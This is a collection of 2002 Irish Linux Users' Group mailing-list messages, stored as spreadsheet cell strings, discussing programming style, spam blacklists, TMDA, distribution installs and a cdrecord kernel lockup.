&gt; or is the goto used as a kind of common enemy of 
&gt; programming syntax
&gt; to make sure people use loops or recursion?
&gt; &lt;&gt; Recursion is only truely useful if you have an infinite stack. People
that think they have an infinite stack shouldn't be let near a compiler.&gt; Kind of makes you wonder about things considered to be 'good'.  For
&gt; example people bang on about polymorphism, but is there actually any
&gt; advantage in using an overloaded function based on class inheritance? I don't care, to be honest.Kate
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;Tracking it down showed that my
&gt;predecessor's "add new entries to the end of its linked list" function
&gt;recursively called itself with each following link until the terminating
&gt;one showed up. Of course it died miserably when it ran out of stack. I'm
&gt;sure he felt he'd done a good days work when he planted that bomb for
&gt;me./Enter the rant.One thing that really bugs me is when people say things like."On the machies we have these days you don't have to worry about
 writing optimised code" or "don't worry about writing
 things inline, just use a function""Yeah and add a procedure prolog or eight", I always counter,
to be told
"On the machines we have these days....."Boggle.-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">On Thu, Aug 08, 2002 at 12:00:04PM +0100, Padraig Brady wrote:
&gt; Yes a clever term usually (and deservedly) attributed to perl.there's no need for perl to be write only.&gt; Of course you can create write-only code in any language.
&gt; There's even a competition for obfuscated C code which is always
&gt; worth a look: http://www.es.ioccc.org/main.htmlyes, always fun.  it's a good way to learn the little details of c.&gt; p.s. what sort of processing do you do with:
&gt; kevin+dated+1029235349.f17378@ie.suberic.netthat's a dated address:    % tmda-check-address kevin+dated+1029235349.f17378@ie.suberic.net
    STATUS:  VALID
    EXPIRES: Tue Aug 13 10:42:29 2002 UTCwhich means anyone can send email to that address with no problem until
that date.  after that they have to confirm.  more info can be found
here: www.tmda.net.as an aside, it is possible to filter mail to a mailman mailing list
with tmda as well.  subscribers can post to the list without a confirm;
non-subscribers would need to confirm their posts.kevin--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</si>
  <si>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Bod wrote
&gt; /Enter the rant.
&gt;
&gt; One thing that really bugs me is when people say things like.
&gt;
&gt; "On the machies we have these days you don't have to worry about
&gt;  writing optimised code" or "don't worry about writing
&gt;  things inline, just use a function"That sounds a lot like "sure programmers aren't needed anymore, don't
all the new visual thingies mean anyone can do it"[1], or maybe "640k should
be enough for anyone"[2]&gt;
&gt; "Yeah and add a procedure prolog or eight", I always counter,
&gt; to be told
&gt; "On the machines we have these days....."
&gt;
&gt; Boggle.
&gt;
That's recursion for you.C#
[1] This is often followed by "I know what I'm talking about, I can program
HTML but I never need to use it"
[2] Bilge denies he ever said this.
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">I use gnome here on half a dozen sunray 150 boxen. Been trying to get linux
on them for along time with mixed results.. Has anyone succeeded in this?&gt; -&gt; It does work on SunRays. Just install it normally on the 
&gt; server, the sun 
&gt; install will make the necessary changes to the dtlogin screen 
&gt; and you can just 
&gt; select gnome from there. AFAIK you can do this for any window 
&gt; manager. But I 
&gt; don't admin sunray servers so I'm not fully aware of the 
&gt; issues or exact 
&gt; requirements.
&gt; 
&gt; Cheers,
&gt; ~Al
&gt; 
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">On Fri, 9 Aug 2002, Ryan, Shane wrote:&gt; Is this something along the same line as ORBS? SPEWS isnt it. It lists known spam source IPs and netblocks. (and if 
an ISP does nothing more than shift a spammer from IP to IP within the 
ISPs netblock, then the ISPs netblock will be listed.)and there are quite a few ORBS like lists out there - ie known open
relay lists.&gt; I remember not so long ago when eircom was put on the ORBS list,
&gt; half the ISP's in Europe wouldn't accept mail from my address. Of
&gt; course, informing Eircom of this did nothing for about 4 months or
&gt; so.shame.get a different ISP so.&gt; IMHO stopping spammers is a great idea but I'd rather have to hit d
&gt; or delete rather than have my messages bounced by someone else's
&gt; ISP.I'd rather not get spam. sorry.&gt; Regards,
&gt; Shaneregards,
-- 
Paul Jakma	Sys Admin	Alphyra
	paulj@alphyra.ie
Warning: /never/ send email to spam@dishone.st or trap@dishone.st
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Matthew French's [mfrench42@yahoo.co.uk] 65 lines of wisdom included:
&gt; Brian O'Donoghue wrote a code fragment:
&gt; &gt; For(a=0;a &gt; {
&gt; &gt;  some_thing_goes_here();
&gt; &gt;
&gt; &gt;  if(b=strlen(somestring)-4)
&gt; &gt; do_something;
&gt; &gt;
&gt; &gt; };
&gt; 
&gt; Unfortunately strlen is a relatively expensive operation. If you are using
&gt; C++ this is not such a big issue as string.length() can be declared const.
&gt; So long as you do not modify the string object, the compiler can do the
&gt; caching for you.There's a more simple reason as to why strlen shouldn't be used on
the string here, and that's because in future you could actually
change the contents of ``somestring'' within the for loop, and be
left wondering why the number of iterations are not as you expect.Phil.-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">I get a different effect. I open new links in a tab, and they "open in the 
background" or the current page still remains selected. Unfortunately the 
other tab gets the focus. 
The same happens with pages (re)loading in other tabs -&gt; the current tab loses 
the keyboard focus which can be very annoying when filling in forms or even 
when scrolling using the mouse-wheel.Donncha.
On Friday 09 August 2002 14:21, kevin lyda wrote:
&gt; ok, in a galeon browser window i open a new window by middle-clicking
&gt; a link.  the window comes up under my mouse.  however, keys i type go to
&gt; the first window.  anyone else have this problem, and did they solve it?
&gt; i use sawfish as my wm with sloppy focus.
&gt;
&gt; kevin-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">ok, in a galeon browser window i open a new window by middle-clicking
a link.  the window comes up under my mouse.  however, keys i type go to
the first window.  anyone else have this problem, and did they solve it?
i use sawfish as my wm with sloppy focus.kevin--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</si>
  <si>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notSteven Satelle
TAC
i606 4372-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi folks,I have just taken delivery of three Acer Travelmate laptops from a project
we funded which has now ended.  Problem is there are HDD passwords on them
which I don't have.  How could I overwrite these?? Any ideas?  I have
limited technical and monetry resources here in the new job so can't be
buying new HDDs for them.Any Ideas?Davewww.davidcrozier.co.uk-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">If it has a usb cable it'll more than likely work. You just plug it in, load 
the right modules and mount the camera as another device. You should eject 
the device after unmounting just to be kind to the camera..Do a google search and you'll find plenty of info.Donncha.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Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1David Crozier wrote:
| Hi folks,
|
| I have just taken delivery of three Acer Travelmate laptops from a project
| we funded which has now ended.  Problem is there are HDD passwords on them
| which I don't have.  How could I overwrite these?? Any ideas?  I have
| limited technical and monetry resources here in the new job so can't be
| buying new HDDs for them.
|
| Any Ideas?
|
| Dave
|
| www.davidcrozier.co.uk
|Google returns about 1500 hits for the search
"remove acer hard drive password"Perhaps one of those might help.Here, I'll even quote the search URL:
http://www.google.com/search?q=remove%20acer%20hard%20drive%20password&amp;sourceid=mozilla-xulWaider.
- --
waider@waider.ie / Yes, it /is/ very personal of me
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.orgiD8DBQE9U53aUXuYo0fJk9MRAhhuAKD9o7vvkLNDcxK4cgMzXLC5HWgc1QCg8afN
UBbeKiDH1hBgCxY5+y1Wmes=
=ZdI+
-----END PGP SIGNATURE-----
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Brian O'Donoghue wrote a code fragment:
&gt; For(a=0;a {
&gt;  some_thing_goes_here();
&gt;
&gt;  if(b=strlen(somestring)-4)
&gt; do_something;
&gt;
&gt; };Unfortunately strlen is a relatively expensive operation. If you are using
C++ this is not such a big issue as string.length() can be declared const.
So long as you do not modify the string object, the compiler can do the
caching for you.I do not think this is possible in C, though?You could write the same code fragment as:
============================
for(a=0,l=strlen(somestring);a&lt;l;a++)
{
    some_thing_goes_here();
    if(b==l-4)
        do_something();
}
============================Note my previous point: if some_thing_goes_here() or do_something() are very
long functions, then there is no real need to optimise this code.Also, for string manipulation, a much better approach would be:
============================
char c;
char* p;
for(p=somestring,(c=*p)!=0;p++)
{
    some_thing_goes_here();
    if(*(p+4)==0)
        do_something();
}
============================This works because C used \0 terminated strings. It improves performance
because you always have a pointer to the character instead of having to do
array manipulation. Strictly speaking, the variable c is not required as
most compilers are smart enough to store *p in a register.The problem is that this uses pointer arithmetic, which can make the code
illegable if not managed carefully. Which is one of the reasons I prefer
Java for most programming tasks.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</si>
  <si>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involved...)Yes and I understand that argument, however.
Sometimes I find that if I don't try to write code in the least space
possible or for example become lazy and say--Bad style
Bool q;If(q)
	When I should say
If(q==true)
Or--Bad optimizationint a;
a=some_function();
if(a) &lt;--which apparently works but is 'bad coding style'.That's what I mean about letting the programming tools take care
of the coding.... it's considered 'bad' apparently.Or for example say you are writing a loop that saysFor(a=0;a&gt;-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;You could also change your e-mail to a more responsible provider. If 
&gt;Eircom
&gt;are not up to scratch, then use somebody else and make sure you let 
&gt;Eircom
&gt;know why you think they are so useless. You can still keep your old 
&gt;e-mail
&gt;address if you have to.Since have done thanks, unfortunately Eircom 
have a severe case of 'selective hearing'. It 
seems that customer comments are only appreciated 
when they are positive. When I was complaining
they also decided that I wasn't a paying 
subscription customer but an Indigo GoFree one 
and that if I didn't use Windows that there was 
obviously something wrong with me (I mean who's
ever heard of Linux?).&gt;To suggest that ISP's should not protect themselves against 
&gt;incompotent
&gt;configurations would effectively be a vote in support of SPAM.True, I apologise for that. It was just the way
in which Eircom (didn't) deal with the ORBS problem.Regards,
Shane-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Shan Ryan suggested:
&gt; IMHO stopping spammers is a great idea but I'd rather
&gt; have to hit d or delete rather than have my messages
&gt; bounced by someone else's ISP.You could also change your e-mail to a more responsible provider. If Eircom
are not up to scratch, then use somebody else and make sure you let Eircom
know why you think they are so useless. You can still keep your old e-mail
address if you have to.To suggest that ISP's should not protect themselves against incompotent
configurations would effectively be a vote in support of SPAM.-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</si>
  <si>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Gary Coady wrote:
&gt;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This is something that often annoys me. Programmers can spend hours inlining
code and relying on optimisation tools to improve performance. The best
performance improvement can be obtained by fixing the algorithm.Most function calls get made very rarely. Optimising them often makes no
sense, produces illegable code and nonsense algorithms.Inlining will help in functions that get called frequently and are small -
such as string manipulation routines. But these are a small part of most
applications.One example I frequently see is people optimising a database function call.
Most database accesses involve many abstraction layers and millions of
instruction cycles. Trying to save a few instruction cycles would be a cost
saving of, say, 5 seconds in 20 hours.But a simple hashmap cache of common data without any compiler or inline
optimisations can turn that same 20 hours into 10 minutes.- Matthew (who really should be writing code)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</si>
  <si>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On Fri, Aug 09, 2002 at 09:30:29AM +0100, Ryan, Shane mentioned:
&gt; IMHO stopping spammers is a great idea but I'd rather
&gt; have to hit d or delete rather than have my messages
&gt; bounced by someone else's ISP. I'd prefer to use an ISP that didn't tolerate spammers myself. The only way Spam lists work is because ISP's customers find they can't
send mail to many domains, and ask the ISP to do something about it.Kate
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">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again.Kate
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">On Thu, Aug 08, 2002 at 01:40:30PM +0100, Brian O'Donoghue wrote:
&gt; One thing that really bugs me is when people say things like.
&gt; 
&gt; "On the machies we have these days you don't have to worry about
&gt;  writing optimised code" or "don't worry about writing
&gt;  things inline, just use a function"Oops, I tend to feel like that most times! I tend to feel that if we
have extremely good compilation tools, then those tools should be able
to do the inlining and optimisation far better than I could. That's the
theory anyway :) And there's always a tradeoff with inlining between
speed and memory bloat (which may sometimes be no tradeoff if swap
starts getting involved...)Gary.-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">John P. Looney wrote:
&gt; On Thu, Aug 08, 2002 at 11:51:18AM -0600, Scott Wunsch mentioned:
&gt; 
&gt;&gt;On Thu, 08-Aug-2002 at 11:31:01 +0100, John P. Looney wrote:
&gt;&gt;
&gt;&gt;&gt; I've installed Redhat 7.3 on a raq3's disk. But fscked if I can get the
&gt;&gt;&gt;kernel in /boot/vmlinuz-2.4.18-3 to boot. It's insisting pulling the
&gt;&gt;&gt;kernel from ... somewhere else. The old cobalt kernel.
&gt;&gt;
&gt;&gt;http://www.gurulabs.com/rgh-cobalt-howto/index.html
&gt;&gt;
&gt;&gt;The Cobalt systems have some neat firmware boot code that will read the
&gt;&gt;ext2 filesystem and find the kernel itself... if you put it exactly where
&gt;&gt;they expect it.
&gt; 
&gt;  Alas, I've been following that howto, and it doesn't seem to work. It
&gt; could be because i'm using ext3 for the rootfs though.ext2 can mount an ext3 partition, but there are
probably small changes required (to the BIOS)
to support this?PÃ¡draig.
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">
&gt;SPEWS: to force ISPs to take action against spammers 
&gt;
&gt;SPEWS /will/ list entire ISP netblocks /if/ the ISP consistently
&gt;ignores/fails to take action on abuse reports over the course of
&gt;several months. however, they're pretty quick at delisting once action
&gt;is taken. in the long-term, and in absence of global and effective 
&gt;anti-UCE regulations, it's the only realistic way to get to a spam 
&gt;free internet.
&gt;
&gt;Open relay lists: to protect against relays obviously.Is this something along the same line as ORBS?
I remember not so long ago when eircom was put
on the ORBS list, half the ISP's in Europe wouldn't
accept mail from my address. Of course, informing
Eircom of this did nothing for about 4 months or so.IMHO stopping spammers is a great idea but I'd rather
have to hit d or delete rather than have my messages
bounced by someone else's ISP.Regards,
Shane-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">On Thu, Aug 08, 2002 at 11:51:18AM -0600, Scott Wunsch mentioned:
&gt; On Thu, 08-Aug-2002 at 11:31:01 +0100, John P. Looney wrote:
&gt; &gt;  I've installed Redhat 7.3 on a raq3's disk. But fscked if I can get the
&gt; &gt; kernel in /boot/vmlinuz-2.4.18-3 to boot. It's insisting pulling the
&gt; &gt; kernel from ... somewhere else. The old cobalt kernel.
&gt; http://www.gurulabs.com/rgh-cobalt-howto/index.html
&gt; 
&gt; The Cobalt systems have some neat firmware boot code that will read the
&gt; ext2 filesystem and find the kernel itself... if you put it exactly where
&gt; they expect it. Alas, I've been following that howto, and it doesn't seem to work. It
could be because i'm using ext3 for the rootfs though.Kate
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi all,I have a debian machine with an external ISDN terminal adapter, which 
I'm trying to get to dial a Cisco 3600 running CHAP. wvdial on Red Hat 
copes fine with this. However, I get the same results if i use pon or 
wvdial on Debian: pppd negotiation is detected, pppd is started -- and 
I'm never assigned an IP address.Looking at the logs on the Cisco, I see that in place of the username I 
seem to be transmitting a six-digit hex number. e.g.:Aug  8 23:35:00.311 UTC+1: %ISDN-6-CONNECT: Interface Serial0/0:19 is 
now connected to  19eb85The last entry should be my dialup username. (Substitute incoming phone 
number for ).Any ideas what I'm doing wrong?Cheers,
Dave
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Mark Page  printfdAPOLOGIES IN ADVANCE FOR 80 CHAR LINES IN WEB MAIL (will get a mail client for this soon, honest)&gt; Has anybody on the list installed/used this distro? If so wouldn't mind a bit 
&gt; of help.
&gt; 
&gt;  Burnt the ISO's from the latest Linux Format magazine. Took a couple of 
&gt; attempts to install but got there. My problem - I have a standard dial-up 
&gt; modem and the installation gives you the network card setup so internet 
&gt; download is out of the question, but, I installed the Stage3 tarball which 
&gt; puts the .tgz files on your harddrive. 
&gt; 
&gt;  So methinks, I have the software there and all I need to do is install so as 
&gt; 1) get the necessary programmes to connect to the net and 2) install any 
&gt; other programmes I might need.
&gt; 
&gt;  What actually happens is that if, for example, I attempt to install the KDE 
&gt; package, the system goes looking for any dependencies on the net despite the 
&gt; fact that the dependencies reside on my hard drive. Obviously I can't install 
&gt; anything.
&gt; 
&gt;  Have checked all docs on the web page and nothing deals with a standard 
&gt; dial-up modem or how to tell the package manager to look for the dependencies 
&gt; on the hard drive.
&gt; 
&gt;  Anybody able to help me here?
&gt; 
&gt;  Thanks in anticipation.
Yup I'm running it on my k6 233 laptop. It's tres sweet.I would recommend getting wvdial, opening a virtual terminal dialing the internet and then emerging the packages you need.I did my install over my home lan and the lan in work (which has DSL - running Linux as firewall/router/mailserver of course).But yes you will need at least wvdial to make this puppy happen me thinks.In fact it looks as if the base install comes with wvdial for just this kind of instal.But I just found this on the Gentoo site for you.
http://forums.gentoo.org/viewtopic.php?t=4691&amp;highlight=modemSpecificallyquote:
If it is not too obvious, these are the steps I took.
    * Boot off the install CD
    * modprobe serial
    * setserial (if needed)
    * create mount point for other distribution
    * mount other distribution
    * chroot'd to other distribution
    * su - to regular user
    * ran wvdial
    * switch consoles and install as normal
And yes I do give better technical support to people who use
distros I like.I'm only laughing on the outside 
My smile is just skin deep 
If you could see inside I'm really crying 
You might join me for a weep.
&lt;&gt;
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Has anybody on the list installed/used this distro? If so wouldn't mind a bit 
of help. Burnt the ISO's from the latest Linux Format magazine. Took a couple of 
attempts to install but got there. My problem - I have a standard dial-up 
modem and the installation gives you the network card setup so internet 
download is out of the question, but, I installed the Stage3 tarball which 
puts the .tgz files on your harddrive.  So methinks, I have the software there and all I need to do is install so as 
1) get the necessary programmes to connect to the net and 2) install any 
other programmes I might need. What actually happens is that if, for example, I attempt to install the KDE 
package, the system goes looking for any dependencies on the net despite the 
fact that the dependencies reside on my hard drive. Obviously I can't install 
anything. Have checked all docs on the web page and nothing deals with a standard 
dial-up modem or how to tell the package manager to look for the dependencies 
on the hard drive. Anybody able to help me here? Thanks in anticipation.-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">On Thu, 8 Aug 2002, kevin lyda wrote:&gt; the more the merrierindeed.&gt; - makes it harder for spammers to do their work. however, tmda isn't
&gt; an smtp proxy normally.well, smtp being store and forward, what is an smtp proxy? :) that's 
why i said "proxy".probably, the most effective way to stop spam in the long-term is to 
configure your email server to use the SPEWS blacklist and a good open 
relay blacklist.SPEWS: to force ISPs to take action against spammers SPEWS /will/ list entire ISP netblocks /if/ the ISP consistently
ignores/fails to take action on abuse reports over the course of
several months. however, they're pretty quick at delisting once action
is taken. in the long-term, and in absence of global and effective 
anti-UCE regulations, it's the only realistic way to get to a spam 
free internet.Open relay lists: to protect against relays obviously.&gt; kevinregards,
-- 
Paul Jakma	Sys Admin	Alphyra
	paulj@alphyra.ie
Warning: /never/ send email to spam@dishone.st or trap@dishone.st-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">On Thu, 8 Aug 2002, Paul Jakma wrote:&gt;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http://messagewall.org/same concept as tmda (smtp "proxy") but not as extreme as tmda.net - 
dnsbl, distributed checksum and various other checks.regards,
-- 
Paul Jakma	Sys Admin	Alphyra
	paulj@alphyra.ie
Warning: /never/ send email to spam@dishone.st or trap@dishone.st
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">On Thu, 8 Aug 2002, kevin lyda wrote:&gt; i'm certain they already do strip after the +.  however, they'll
&gt; have to respond to a confirm message when they send to my raw
&gt; address.  and responding to a confirm message requires spammers to
&gt; provide a real email address (which i can then blacklist - i've
&gt; mapped y in mutt to whitelist; Y to blacklist) and effectively send
&gt; the spam to each individual (which makes spamming more expensive
&gt; bandwidthwise for the spammer).unfortunately, often spammers provide real return addresses - just not 
their own.so if everyone used tmda, these poor unfortunates would receive
millions of tmda confirm messages, in addition to the hundred thousand
'undeliverable' messages that they already get..&gt; kevinregards,
-- 
Paul Jakma	Sys Admin	Alphyra
	paulj@alphyra.ie
Warning: /never/ send email to spam@dishone.st or trap@dishone.st
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">On Thu, 08-Aug-2002 at 11:31:01 +0100, John P. Looney wrote:&gt;  I've installed Redhat 7.3 on a raq3's disk. But fscked if I can get the
&gt; kernel in /boot/vmlinuz-2.4.18-3 to boot. It's insisting pulling the
&gt; kernel from ... somewhere else. The old cobalt kernel.http://www.gurulabs.com/rgh-cobalt-howto/index.htmlThe Cobalt systems have some neat firmware boot code that will read the
ext2 filesystem and find the kernel itself... if you put it exactly where
they expect it.-- 
Take care,
Scott \\'unsch... Old musicians never die, they just decompose.-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi all,
Is there any way that the mailing list can be 
turned into newsgroup?Newsgroups are great for threading of discussions,
working offline and I feel that they work
much better for this sort of technical discussion
than a mailing list.Any ideas?
Paul...p.s. Hamster doesn't work, cos I get the list
through Yahoo!
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</si>
  <si>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
Hi all,
I'm looking for the disks for SUSE 8. Does anybody
have them for a reasonable price?
I'm available to collect at the time of your
convenience anywhere in the East/Greater
Dublin area!
TIA.
Paul...
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</si>
  <si>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has anyone had a problem with Yast2 not being able to
mount a source medium for installing new packages, on
suse 8.0?it finds the directory containing the source, so the
installation program gets as far as selecting
packages, and formatting, but then says it can't mount
the source directory?http://digital.yahoo.com.au - Yahoo! Digital How To
- Get the best out of your PC!-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">
John Reilly  a Ã©crit:&gt; &gt; Newsgroups are great for threading of discussions,
&gt; &gt; working offline and I feel that they work
&gt; &gt; much better for this sort of technical discussion
&gt; &gt; than a mailing list. 
&gt; I suppose its all down to personal preference, but I
&gt; disagree strongly.
I suppose it is - however, nobody knows that
this message is a response to your one or a 
follow-up to my own first message. With a newsgroup structure, this is obvious. This helps the reader eliminate threads which
are irrelevant to them or whatever.
Paul...___________________________________________________________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</si>
  <si>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&gt; Is there any way that the mailing list can be 
&gt; turned into newsgroup?
&gt; 
&gt; Newsgroups are great for threading of discussions,
&gt; working offline and I feel that they work
&gt; much better for this sort of technical discussion
&gt; than a mailing list.I suppose its all down to personal preference, but I disagree strongly.
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">On Sat, Aug 10, 2002 at 12:00:15AM +0200, Paul Linehan wrote:
&gt; I suppose it is - however, nobody knows that
&gt; this message is a response to your one or a 
&gt; follow-up to my own first message. Get a decent mail client, I can tell what it is 
extremely easily. &gt; With a newsgroup structure, this is obvious. 
&gt; 
&gt; This helps the reader eliminate threads which
&gt; are irrelevant to them or whatever.*looks at mutt*-- 
colmmacc@redbrick.dcu.ie        PubKey: colmmacc+pgp@redbrick.dcu.ie  
Web:                                 http://devnull.redbrick.dcu.ie/ -- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">On Fri, Aug 09, 2002 at 08:07:33PM +0200, Paul Linehan wrote:
&gt; Is there any way that the mailing list can be 
&gt; turned into newsgroup?yep, mail to news gateways are common.http://www.tldp.org/HOWTO/mini/Mail2News.html-- 
colmmacc@redbrick.dcu.ie        PubKey: colmmacc+pgp@redbrick.dcu.ie  
Web:                                 http://devnull.redbrick.dcu.ie/ -- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;has anyone had a problem with Yast2 not being able to
&gt;mount a source medium for installing new packages, on
&gt;suse 8.0?Nope, can't say that I had any problems installing SuSE 8.0. Just stuck in 
the DVD, did the install and WHAM, got a working distro. QUite an impressive 
one too, by the way!Mike_________________________________________________________________
Send and receive Hotmail on your mobile device: http://mobile.msn.com
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi all,
I've run into a fairly intractable (for me) problem, and was wondering
if anybody could give me pointers on how to deal with it.I am running Debian Woody on a Pentium III IDE based system.
I have a Ricoh 7083a ide cd rewriter, which I use using cdrecord and the
scsi over ide kernel modules.  I was running kernel 2.4.18 until
probably last weekend when I noticed 2.4.19 was out.  Downloaded patch
and installed new kernel with no real problems.  This morning I went to
burn a CDROM, and the system locked hard.  Rebooting into 2.4.18 allowed
cdburning to work fine.This problem is very reproducible (on my system at least).
the cdrecord command I was using was
    cdrecord -v speed=4 blank=fast dev=0,1,0 -data bak.iso
The blanking appears to go ok, but when it tries to write data, it just
locks up the entire system (can't ping it from outside even).  AFAICS,
the system just stops.  Hard reset is only way back in, and when it does
reboot, I cannot see anything useful in any logfiles (/var/log/messages
/var/log/kern.log /var/log/syslog, at any rate).
cdrecord -scanbus works fine and reports the two pseudo-scsi devices (my
cdr drive and my cdrw).
The same lock occurs even if there is no blanking.I tried upgrading to 2.4.20-pre1-ac1 (on assumption that if there was a
kernel issue it might have been fixed in these patches), but it gives
the same error.  I also downloaded and compiled the source for
cdrecord 1.1.10, and installed it instead of the debian package (i was
wondering if maybe there was some compile option the packager had used
which maybe would cause the problem), and still the problem persisted.Anyway, I'm completely stumped.  Google searching has not done me much
good, and I'm a little bit lost.  What I'd like to know is
a)  How to fix the problem ;-)
b)  Is this likely to be an application or kernel problem?  The severity
    of the crash would make me suspect it is a kernel problem, but I'm
    not very knowledgeable on these things.
c)  Should I post a description of this to the kernel mailing list? If
    this is an appropriate course of action, are there any tips (beyond
    the guidelines on kernel.org)?Like I said, I'm lost on this one, so any info is very gratefully
received.
mick
-- 
Michael Conry   Ph.:+353-1-7161987, Web: http://www.acronymchile.com
Key fingerprint = 5508 B563 6791 5C84 A947  CB01 997B 3598 09DE 502C-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,I have been using 2.4.19 since a couple of days on a Mandrake 8.2 with
standard RPMs for cdrecord and it didn't give any hard locks on it at
all, i've already burnt a couple of CDs.StephOn Sat, 2002-08-10 at 01:58, Michael Conry wrote:
&gt; Hi all,
&gt; I've run into a fairly intractable (for me) problem, and was wondering
&gt; if anybody could give me pointers on how to deal with it.
&gt; 
&gt; I am running Debian Woody on a Pentium III IDE based system.
&gt; I have a Ricoh 7083a ide cd rewriter, which I use using cdrecord and the
